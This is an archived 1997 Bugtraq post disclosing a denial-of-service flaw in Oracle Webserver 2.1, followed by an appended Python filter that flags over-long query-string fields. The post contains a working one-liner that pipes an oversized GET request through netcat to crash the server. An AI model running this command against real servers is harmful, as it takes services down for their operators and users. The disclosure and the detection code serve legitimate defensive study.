Bugtraq mailing list archives
DoS against Oracle Webserver 2.1 with PL/SQL stored procedures
From: jas () PDC KTH SE (Simon Josefsson)
Date: Wed, 23 Jul 1997 00:15:31 +0200
Fellow bugtraqers,

I stumbled over this tonight. It's a DoS-attack against an Oracle Webserver 2.1 that serves PL/SQL stored procedures. The server dumps quietly, I haven't found anything in the logs. v2.0 does not seem to exhibit this behaviour (v2.1 is the latest, but many sites seem to still run v2.0).

I'm sorry if this is old news (but I'd appreciate it if someone told me if there is a bugfix somewhere).

(PL/SQL is, simply put, a scripting language within the Oracle database)

---
#!/bin/sh
#
# requires Perl and NetCat.
#
# usage:
#  prg <host> <port> <path>
#
# example:
#
#  ./prg your.own.domain.com 80 /ows-bin
#
# if you have the PL/SQL stored procedure in /ows-bin/.
#
perl -e 'print "GET $ARGV[0]/fnord?foo=", "a" x 2600, " HTTP/1.0\n\n\n\n";' "$3" | nc "$1" "$2"
---

S.
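A defensive check for the request shape in the message above, as an added example that is not part of the original post: it flags request lines whose query-string fields or whole request target exceed a length limit, as a front-end filter or log review would. The limits, function names and sample lines are assumptions constructed for illustration; the post does not state the length at which the server fails.

```python
"""Flag HTTP request lines carrying over-long query-string fields."""
from urllib.parse import urlsplit, parse_qsl

MAX_FIELD_LEN = 1024   # assumed policy limit, not a value from the post
MAX_TARGET_LEN = 2048  # assumed policy limit for the whole request target


def check_request_line(line, max_field=MAX_FIELD_LEN, max_target=MAX_TARGET_LEN):
    """Return a list of findings for one request line; empty if clean."""
    parts = line.strip().split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return ["malformed request line"]
    target = parts[1]
    findings = []
    if len(target) > max_target:
        findings.append(f"target length {len(target)} > {max_target}")
    # A field without '=' is parsed as (name, ''), so check both halves.
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        longest = max(len(name), len(value))
        if longest > max_field:
            findings.append(f"field {name[:16]!r} length {longest} > {max_field}")
    return findings


def scan(lines):
    """Map 1-based line number -> findings for every flagged request line."""
    flagged = {}
    for number, line in enumerate(lines, 1):
        findings = check_request_line(line)
        if findings:
            flagged[number] = findings
    return flagged


# Constructed sample request lines (not captured traffic).
SAMPLE = [
    "GET /ows-bin/fnord?foo=bar HTTP/1.0",
    "GET /ows-bin/fnord?foo=" + "a" * 2600 + " HTTP/1.0",
    "GET /index.html HTTP/1.0",
    "GET /ows-bin/fnord?" + "b" * 1500 + " HTTP/1.0",
]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE).items():
        print(number, findings)
```

Since the post reports that the server itself logs nothing, a check like this belongs in front of it (proxy or network sensor) rather than on its own logs.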